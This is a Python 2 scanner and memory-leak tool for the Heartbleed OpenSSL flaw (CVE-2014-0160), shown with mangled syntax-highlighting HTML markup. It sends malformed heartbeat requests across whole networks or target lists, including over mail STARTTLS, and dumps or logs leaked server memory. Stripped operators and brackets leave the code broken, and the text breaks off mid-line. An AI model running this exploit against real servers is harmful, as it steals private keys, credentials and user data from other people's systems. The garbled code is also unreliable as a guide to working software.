bold>import/span> span stylecolor: #0000FF; font-weight: bold>pprint/span>span stylecolor: #AA22FF; font-weight: bold>from/span> span stylecolor: #0000FF; font-weight: bold>optparse/span> span stylecolor: #AA22FF; font-weight: bold>import/span> OptionParserspan stylecolor: #AA22FF; font-weight: bold>from/span> span stylecolor: #0000FF; font-weight: bold>netaddr/span> span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #666666>*/span>span stylecolor: #AA22FF; font-weight: bold>from/span> span stylecolor: #0000FF; font-weight: bold>socket/span> span stylecolor: #AA22FF; font-weight: bold>import/span> error span stylecolor: #AA22FF; font-weight: bold>as/span> socket_errorspan stylecolor: #AA22FF; font-weight: bold>from/span> span stylecolor: #0000FF; font-weight: bold>random/span> span stylecolor: #AA22FF; font-weight: bold>import/span> shuffleoptions span stylecolor: #666666>/span> OptionParser(usagespan stylecolor: #666666>/span>span stylecolor: #BB4444>'%prog ipaddress options'/span>, descriptionspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Network scanner for SSL heartbeat vulnerability (CVE-2014-0160)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-p'/span>, span stylecolor: #BB4444>'--port'/span>, span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'int'/span>, defaultspan stylecolor: #666666>443/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'TCP port to test (default: 443)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-t'/span>, span stylecolor: #BB4444>'--timeout'/span>,span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'int'/span>, defaultspan stylecolor: #666666>5/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Socket timeout setting in seconds (default: 5)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-f'/span>, span stylecolor: #BB4444>'--file'/span>,span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'string'/span>, defaultspan stylecolor: #666666>/span>span stylecolor: #BB4444>''/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Write leaked memory to file (default: none)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-n'/span>, span stylecolor: #BB4444>'--network'/span>,span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'string'/span>, defaultspan stylecolor: #666666>/span>span stylecolor: #BB4444>''/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Network you want to scan in CDIR (192.168.1.0/24)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-i'/span>, span stylecolor: #BB4444>'--input'/span>, span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'string'/span>, defaultspan stylecolor: #666666>/span>span stylecolor: #BB4444>''/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Get the target IP addresses from a list file'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-r'/span>, span stylecolor: #BB4444>'--random'/span>, actionspan stylecolor: #666666>/span>span stylecolor: #BB4444>'store_true'/span>, destspan stylecolor: #666666>/span>span stylecolor: #BB4444>'random'/span>, defaultspan stylecolor: #666666>/span>span stylecolor: #BB4444>'True'/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'Randomize the IP addresses to scan (default: false)'/span>)optionsspan stylecolor: #666666>./span>add_option(span stylecolor: #BB4444>'-s'/span>, span stylecolor: #BB4444>'--service'/span>, span stylecolor: #AA22FF>type/span>span stylecolor: #666666>/span>span stylecolor: #BB4444>'string'/span>, defaultspan stylecolor: #666666>/span>span stylecolor: #BB4444>'HTTPS'/span>, helpspan stylecolor: #666666>/span>span stylecolor: #BB4444>'For some services commands are required to start SSL/TLS session. (HTTPS/SMTP/POP/IMAP)'/span>)span stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>h2bin/span>(x): span stylecolor: #AA22FF; font-weight: bold>return/span> xspan stylecolor: #666666>./span>replace(span stylecolor: #BB4444>' '/span>, span stylecolor: #BB4444>''/span>)span stylecolor: #666666>./span>replace(span stylecolor: #BB4444>'/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span>, span stylecolor: #BB4444>''/span>)span stylecolor: #666666>./span>decode(span stylecolor: #BB4444>'hex'/span>)version span stylecolor: #666666>/span> versionspan stylecolor: #666666>./span>append(span stylecolor: #BB4444>'SSL 3.0'/span>,span stylecolor: #BB4444>'03 00'/span>)versionspan stylecolor: #666666>./span>append(span stylecolor: #BB4444>'TLS 1.0'/span>,span stylecolor: #BB4444>'03 01'/span>)versionspan stylecolor: #666666>./span>append(span stylecolor: #BB4444>'TLS 1.1'/span>,span stylecolor: #BB4444>'03 02'/span>)versionspan stylecolor: #666666>./span>append(span stylecolor: #BB4444>'TLS 1.2'/span>,span stylecolor: #BB4444>'03 03'/span>)span stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>create_hello/span>(version): hello span stylecolor: #666666>/span> h2bin(span stylecolor: #BB4444>'16 '/span> span stylecolor: #666666>+/span> version span stylecolor: #666666>+/span> span stylecolor: #BB4444>' 00 dc 01 00 00 d8 '/span> span stylecolor: #666666>+/span> version span stylecolor: #666666>+/span> span stylecolor: #BB4444>''' 53/span>span stylecolor: #BB4444>43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf/span>span stylecolor: #BB4444>bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00/span>span stylecolor: #BB4444>00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88/span>span stylecolor: #BB4444>00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c/span>span stylecolor: #BB4444>c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09/span>span stylecolor: #BB4444>c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44/span>span stylecolor: #BB4444>c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c/span>span stylecolor: #BB4444>c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11/span>span stylecolor: #BB4444>00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04/span>span stylecolor: #BB4444>03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19/span>span stylecolor: #BB4444>00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08/span>span stylecolor: #BB4444>00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13/span>span stylecolor: #BB4444>00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00/span>span stylecolor: #BB4444>00 0f 00 01 01/span>span stylecolor: #BB4444>'''/span>) span stylecolor: #AA22FF; font-weight: bold>return/span> hellospan stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>create_hb/span>(version): hb span stylecolor: #666666>/span> h2bin(span stylecolor: #BB4444>'18 '/span> span stylecolor: #666666>+/span> version span stylecolor: #666666>+/span> span stylecolor: #BB4444>' 00 03 01 40 00'/span>) span stylecolor: #AA22FF; font-weight: bold>return/span> hbspan stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>hexdump/span>(s,logfilename, target_ip): span stylecolor: #AA22FF; font-weight: bold>for/span> b span stylecolor: #AA22FF; font-weight: bold>in/span> span stylecolor: #AA22FF>xrange/span>(span stylecolor: #666666>0/span>, span stylecolor: #AA22FF>len/span>(s), span stylecolor: #666666>16/span>): lin span stylecolor: #666666>/span> c span stylecolor: #AA22FF; font-weight: bold>for/span> c span stylecolor: #AA22FF; font-weight: bold>in/span> sb : b span stylecolor: #666666>+/span> span stylecolor: #666666>16/span> hxdat span stylecolor: #666666>/span> span stylecolor: #BB4444>' '/span>span stylecolor: #666666>./span>join(span stylecolor: #BB4444>'/span>span stylecolor: #BB6688; font-weight: bold>%02X/span>span stylecolor: #BB4444>'/span> span stylecolor: #666666>%/span> span stylecolor: #AA22FF>ord/span>(c) span stylecolor: #AA22FF; font-weight: bold>for/span> c span stylecolor: #AA22FF; font-weight: bold>in/span> lin) pdat span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span>span stylecolor: #666666>./span>join((c span stylecolor: #AA22FF; font-weight: bold>if/span> span stylecolor: #666666>32/span> span stylecolor: #666666></span> span stylecolor: #AA22FF>ord/span>(c) span stylecolor: #666666></span> span stylecolor: #666666>126/span> span stylecolor: #AA22FF; font-weight: bold>else/span> span stylecolor: #BB4444>'.'/span> )span stylecolor: #AA22FF; font-weight: bold>for/span> c span stylecolor: #AA22FF; font-weight: bold>in/span> lin) span stylecolor: #AA22FF; font-weight: bold>if/span> logfilename span stylecolor: #666666>!/span> span stylecolor: #BB4444>''/span>: span stylecolor: #AA22FF; font-weight: bold>try/span> : span stylecolor: #AA22FF; font-weight: bold>with/span> span stylecolor: #AA22FF>open/span>(logfilename,span stylecolor: #BB4444>'a'/span>) span stylecolor: #AA22FF; font-weight: bold>as/span> logfile: logfilespan stylecolor: #666666>./span>write(target_ip span stylecolor: #666666>+/span> span stylecolor: #BB4444>'/span>span stylecolor: #BB6622; font-weight: bold>\t/span>span stylecolor: #BB4444>'/span> span stylecolor: #666666>+/span> pdat span stylecolor: #666666>+/span> span stylecolor: #BB4444>'/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span>) span stylecolor: #AA22FF; font-weight: bold>except/span> span stylecolor: #D2413A; font-weight: bold>IOError/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>'Error writing dumps from '/span> span stylecolor: #666666>+/span> target_ip span stylecolor: #666666>+/span> span stylecolor: #BB4444>' to file. Setting file option NULL and resuming scan.'/span> span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' /span>span stylecolor: #BB6688; font-weight: bold>%04x/span>span stylecolor: #BB4444>: /span>span stylecolor: #BB6688; font-weight: bold>%-48s/span>span stylecolor: #BB4444> /span>span stylecolor: #BB6688; font-weight: bold>%s/span>span stylecolor: #BB4444>'/span> span stylecolor: #666666>%/span> (b, hxdat, pdat) span stylecolor: #AA22FF; font-weight: bold>print/span>span stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>recvall/span>(s, length, timeoutspan stylecolor: #666666>5/span>): endtime span stylecolor: #666666>/span> timespan stylecolor: #666666>./span>time() span stylecolor: #666666>+/span> timeout rdata span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span> remain span stylecolor: #666666>/span> length span stylecolor: #AA22FF; font-weight: bold>while/span> remain span stylecolor: #666666>>/span> span stylecolor: #666666>0/span>: rtime span stylecolor: #666666>/span> endtime span stylecolor: #666666>-/span> timespan stylecolor: #666666>./span>time() span stylecolor: #AA22FF; font-weight: bold>if/span> rtime span stylecolor: #666666></span> span stylecolor: #666666>0/span>: span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>None/span> r, w, e span stylecolor: #666666>/span> selectspan stylecolor: #666666>./span>select(s, , , span stylecolor: #666666>5/span>) span stylecolor: #AA22FF; font-weight: bold>if/span> s span stylecolor: #AA22FF; font-weight: bold>in/span> r: data span stylecolor: #666666>/span> sspan stylecolor: #666666>./span>recv(remain) span stylecolor: #008800; font-style: italic># EOF?/span> span stylecolor: #AA22FF; font-weight: bold>if/span> span stylecolor: #AA22FF; font-weight: bold>not/span> data: span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>None/span> rdata span stylecolor: #666666>+/span> data remain span stylecolor: #666666>-/span> span stylecolor: #AA22FF>len/span>(data) span stylecolor: #AA22FF; font-weight: bold>return/span> rdataspan stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>recvmsg/span>(s,target_ip): hdr span stylecolor: #666666>/span> recvall(s, span stylecolor: #666666>5/span>) span stylecolor: #AA22FF; font-weight: bold>if/span> hdr span stylecolor: #AA22FF; font-weight: bold>is/span> span stylecolor: #AA22FF>None/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Unexpected EOF receiving record header - Host closed connection'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>None/span>, span stylecolor: #AA22FF>None/span>, span stylecolor: #AA22FF>None/span> typ, ver, ln span stylecolor: #666666>/span> structspan stylecolor: #666666>./span>unpack(span stylecolor: #BB4444>'>BHH'/span>, hdr) pay span stylecolor: #666666>/span> recvall(s, ln, span stylecolor: #666666>10/span>) span stylecolor: #AA22FF; font-weight: bold>if/span> pay span stylecolor: #AA22FF; font-weight: bold>is/span> span stylecolor: #AA22FF>None/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Unexpected EOF receiving record payload - Host closed connection'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>None/span>, span stylecolor: #AA22FF>None/span>, span stylecolor: #AA22FF>None/span> span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' <3 Received message: type /span>span stylecolor: #BB6688; font-weight: bold>%d/span>span stylecolor: #BB4444>, ver /span>span stylecolor: #BB6688; font-weight: bold>%04x/span>span stylecolor: #BB4444>, length /span>span stylecolor: #BB6688; font-weight: bold>%d/span>span stylecolor: #BB4444>'/span> span stylecolor: #666666>%/span> (typ, ver, span stylecolor: #AA22FF>len/span>(pay)) span stylecolor: #AA22FF; font-weight: bold>return/span> typ, ver, payspan stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>hit_hb/span>(s,hb,target_ip,logfilename): sspan stylecolor: #666666>./span>send(hb) span stylecolor: #AA22FF; font-weight: bold>while/span> span stylecolor: #AA22FF>True/span>: typ, ver, pay span stylecolor: #666666>/span> recvmsg(s,target_ip) span stylecolor: #AA22FF; font-weight: bold>if/span> typ span stylecolor: #AA22FF; font-weight: bold>is/span> span stylecolor: #AA22FF>None/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' No heartbeat response received, server likely not vulnerable'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>False/span> span stylecolor: #AA22FF; font-weight: bold>if/span> typ span stylecolor: #666666>/span> span stylecolor: #666666>24/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' <3 Received heartbeat response:'/span> hexdump(pay, logfilename, target_ip) span stylecolor: #AA22FF; font-weight: bold>if/span> span stylecolor: #AA22FF>len/span>(pay) span stylecolor: #666666>>/span> span stylecolor: #666666>3/span>: beep() span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' WARNING: server returned more data than it should - server is vulnerable!'/span> span stylecolor: #AA22FF; font-weight: bold>else/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Server processed malformed heartbeat, but did not return any extra data.'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>True/span> span stylecolor: #AA22FF; font-weight: bold>if/span> typ span stylecolor: #666666>/span> span stylecolor: #666666>21/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>'Received alert:'/span> hexdump(pay, logfilename, target_ip) span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Server returned error, likely not vulnerable'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF>False/span>span stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>beep/span>(): span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>"/span>span stylecolor: #BB6622; font-weight: bold>\a/span>span stylecolor: #BB4444>"/span>span stylecolor: #AA22FF; font-weight: bold>def/span> span stylecolor: #00A000>main/span>(): opts, args span stylecolor: #666666>/span> optionsspan stylecolor: #666666>./span>parse_args() span stylecolor: #AA22FF; font-weight: bold>if/span> (span stylecolor: #AA22FF>len/span>(args) span stylecolor: #666666></span> span stylecolor: #666666>1/span>) span stylecolor: #AA22FF; font-weight: bold>and/span> (optsspan stylecolor: #666666>./span>input span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span>) span stylecolor: #AA22FF; font-weight: bold>and/span> (optsspan stylecolor: #666666>./span>network span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span>) : optionsspan stylecolor: #666666>./span>print_help() span stylecolor: #AA22FF; font-weight: bold>return/span> span stylecolor: #AA22FF; font-weight: bold>if/span> (optsspan stylecolor: #666666>./span>input span stylecolor: #666666>!/span> span stylecolor: #BB4444>''/span>): span stylecolor: #AA22FF; font-weight: bold>with/span> span stylecolor: #AA22FF>open/span>(optsspan stylecolor: #666666>./span>input,span stylecolor: #BB4444>'r'/span>) span stylecolor: #AA22FF; font-weight: bold>as/span> inputfile: targetlistspan stylecolor: #666666>/span>inputfilespan stylecolor: #666666>./span>read()span stylecolor: #666666>./span>splitlines() span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>"Starting to scan hosts from "/span> span stylecolor: #666666>+/span> optsspan stylecolor: #666666>./span>input span stylecolor: #666666>+/span> span stylecolor: #BB4444>", "/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(span stylecolor: #AA22FF>len/span>(targetlist)) span stylecolor: #666666>+/span> span stylecolor: #BB4444>" host(s) in total."/span> span stylecolor: #AA22FF; font-weight: bold>elif/span> (optsspan stylecolor: #666666>./span>network span stylecolor: #666666>!/span> span stylecolor: #BB4444>''/span>): targetlist span stylecolor: #666666>/span> IPNetwork(optsspan stylecolor: #666666>./span>network) span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>"Starting to scan network "/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(targetlistspan stylecolor: #666666>./span>network) span stylecolor: #666666>+/span> span stylecolor: #BB4444>" netmask "/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(targetlistspan stylecolor: #666666>./span>netmask) span stylecolor: #666666>+/span> span stylecolor: #BB4444>", "/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(targetlistspan stylecolor: #666666>./span>size) span stylecolor: #666666>+/span> span stylecolor: #BB4444>" host(s) in total."/span> targetlist span stylecolor: #666666>/span> span stylecolor: #AA22FF>list/span>(targetlist) span stylecolor: #AA22FF; font-weight: bold>elif/span> (argsspan stylecolor: #666666>0/span>): targetlist span stylecolor: #666666>/span> targetlistspan stylecolor: #666666>./span>append(argsspan stylecolor: #666666>0/span>) span stylecolor: #AA22FF; font-weight: bold>if/span> (optsspan stylecolor: #666666>./span>service span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span> span stylecolor: #AA22FF; font-weight: bold>or/span> optsspan stylecolor: #666666>./span>service span stylecolor: #666666>/span> span stylecolor: #BB4444>'HTTPS'/span>): command1 span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span> command2 span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span> span stylecolor: #AA22FF; font-weight: bold>elif/span> (optsspan stylecolor: #666666>./span>service span stylecolor: #666666>/span> span stylecolor: #BB4444>'SMTP'/span>): command1 span stylecolor: #666666>/span> span stylecolor: #BB4444>'EHLO domain.net/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> command2 span stylecolor: #666666>/span> span stylecolor: #BB4444>'STARTTLS/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> span stylecolor: #AA22FF; font-weight: bold>elif/span> (optsspan stylecolor: #666666>./span>service span stylecolor: #666666>/span> span stylecolor: #BB4444>'POP3'/span>): command1 span stylecolor: #666666>/span> span stylecolor: #BB4444>'CAPA/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> command2 span stylecolor: #666666>/span> span stylecolor: #BB4444>'STLS/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> span stylecolor: #AA22FF; font-weight: bold>elif/span> (optsspan stylecolor: #666666>./span>service span stylecolor: #666666>/span> span stylecolor: #BB4444>'IMAP'/span>): command1 span stylecolor: #666666>/span> span stylecolor: #BB4444>'a001 CAPB/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> command2 span stylecolor: #666666>/span> span stylecolor: #BB4444>'a002 STARTTLS/span>span stylecolor: #BB6622; font-weight: bold>\n/span>span stylecolor: #BB4444>'/span> span stylecolor: #AA22FF; font-weight: bold>else/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>'Unknown service definiton'/span> span stylecolor: #AA22FF; font-weight: bold>return/span> totalhosts span stylecolor: #666666>/span> span stylecolor: #AA22FF>len/span>(targetlist) logfilename span stylecolor: #666666>/span> optsspan stylecolor: #666666>./span>file target_ip span stylecolor: #666666>/span> span stylecolor: #BB4444>''/span> ip_count span stylecolor: #666666>/span> span stylecolor: #666666>0/span> span stylecolor: #AA22FF; font-weight: bold>if/span> (optsspan stylecolor: #666666>./span>random span stylecolor: #666666>/span> span stylecolor: #AA22FF>True/span>): shuffle(targetlist) span stylecolor: #AA22FF; font-weight: bold>for/span> x span stylecolor: #AA22FF; font-weight: bold>in/span> span stylecolor: #AA22FF>range/span>(span stylecolor: #AA22FF>int/span>(span stylecolor: #AA22FF>len/span>(targetlist))): target_ip span stylecolor: #666666>/span> targetlistx ip_count span stylecolor: #666666>+/span> span stylecolor: #666666>1/span> span stylecolor: #AA22FF; font-weight: bold>for/span> i span stylecolor: #AA22FF; font-weight: bold>in/span> span stylecolor: #AA22FF>range/span>(span stylecolor: #AA22FF>len/span>(version)): span stylecolor: #AA22FF; font-weight: bold>try/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' Scanning '/span>span stylecolor: #666666>+/span>span stylecolor: #AA22FF>str/span>(ip_count)span stylecolor: #666666>+/span>span stylecolor: #BB4444>'/'/span>span stylecolor: #666666>+/span>span stylecolor: #AA22FF>str/span>(totalhosts)span stylecolor: #666666>+/span>span stylecolor: #BB4444>' '/span> span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Trying '/span> span stylecolor: #666666>+/span> versionispan stylecolor: #666666>0/span> span stylecolor: #666666>+/span> span stylecolor: #BB4444>'...'/span> s span stylecolor: #666666>/span> socketspan stylecolor: #666666>./span>socket(socketspan stylecolor: #666666>./span>AF_INET, socketspan stylecolor: #666666>./span>SOCK_STREAM) sspan stylecolor: #666666>./span>settimeout(span stylecolor: #AA22FF>float/span>(optsspan stylecolor: #666666>./span>timeout)) span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Connecting...'/span> sysspan stylecolor: #666666>./span>stdoutspan stylecolor: #666666>./span>flush() sspan stylecolor: #666666>./span>connect((span stylecolor: #AA22FF>str/span>(target_ip), optsspan stylecolor: #666666>./span>port)) span stylecolor: #AA22FF; font-weight: bold>if/span> (command1 span stylecolor: #666666>!/span> span stylecolor: #BB4444>''/span> span stylecolor: #AA22FF; font-weight: bold>and/span> command2 span stylecolor: #666666>!/span> span stylecolor: #BB4444>''/span>): span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Sending command to switch '/span> span stylecolor: #666666>+/span> optsspan stylecolor: #666666>./span>service span stylecolor: #666666>+/span> span stylecolor: #BB4444>' protocol over SSL/TLS and waiting for 1 second to be sure'/span> sspan stylecolor: #666666>./span>send(command1) sspan stylecolor: #666666>./span>send(command2) timespan stylecolor: #666666>./span>sleep(span stylecolor: #666666>1/span>) span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Sending Client Hello...'/span> sysspan stylecolor: #666666>./span>stdoutspan stylecolor: #666666>./span>flush() sspan stylecolor: #666666>./span>send(create_hello(versionispan stylecolor: #666666>1/span>)) span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Waiting for Server Hello...'/span> sysspan stylecolor: #666666>./span>stdoutspan stylecolor: #666666>./span>flush() span stylecolor: #AA22FF; font-weight: bold>while/span> span stylecolor: #AA22FF>True/span>: typ, ver, pay span stylecolor: #666666>/span> recvmsg(s,target_ip) span stylecolor: #AA22FF; font-weight: bold>if/span> typ span stylecolor: #666666>/span> span stylecolor: #AA22FF>None/span>: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Server closed connection without sending Server Hello.'/span> span stylecolor: #AA22FF; font-weight: bold>break/span> span stylecolor: #008800; font-style: italic># Look for server hello done message./span> span stylecolor: #AA22FF; font-weight: bold>if/span> typ span stylecolor: #666666>/span> span stylecolor: #666666>22/span> span stylecolor: #AA22FF; font-weight: bold>and/span> span stylecolor: #AA22FF>ord/span>(payspan stylecolor: #666666>0/span>) span stylecolor: #666666>/span> span stylecolor: #666666>0x0E/span>: span stylecolor: #AA22FF; font-weight: bold>break/span> span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Sending heartbeat request...'/span> sysspan stylecolor: #666666>./span>stdoutspan stylecolor: #666666>./span>flush() sspan stylecolor: #666666>./span>send(create_hb(versionispan stylecolor: #666666>1/span>)) span stylecolor: #AA22FF; font-weight: bold>if/span> hit_hb(s,create_hb(versionispan stylecolor: #666666>1/span>),span stylecolor: #AA22FF>str/span>(target_ip),logfilename): span stylecolor: #008800; font-style: italic>#Stop if vulnerable/span> span stylecolor: #AA22FF; font-weight: bold>break/span> span stylecolor: #AA22FF; font-weight: bold>except/span> socket_error span stylecolor: #AA22FF; font-weight: bold>as/span> serr: span stylecolor: #008800; font-style: italic>#e sys.exc_info()0/span> span stylecolor: #008800; font-style: italic>#print e/span> span stylecolor: #AA22FF; font-weight: bold>if/span> serrspan stylecolor: #666666>./span>errno span stylecolor: #666666>/span> errnospan stylecolor: #666666>./span>ECONNREFUSED: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Refused connection.'/span> span stylecolor: #AA22FF; font-weight: bold>if/span> serrspan stylecolor: #666666>./span>errno span stylecolor: #666666>/span> errnospan stylecolor: #666666>./span>EHOSTDOWN: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Host down.'/span> span stylecolor: #AA22FF; font-weight: bold>if/span> serrspan stylecolor: #666666>./span>errno span stylecolor: #666666>/span> errnospan stylecolor: #666666>./span>ETIMEDOUT: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Connection timed out.'/span> span stylecolor: #AA22FF; font-weight: bold>if/span> serrspan stylecolor: #666666>./span>errno span stylecolor: #666666>/span> errnospan stylecolor: #666666>./span>ECONNRESET: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Connection reset by peer.'/span> span stylecolor: #AA22FF; font-weight: bold>if/span> serrspan stylecolor: #666666>./span>errno span stylecolor: #666666>/span> errnospan stylecolor: 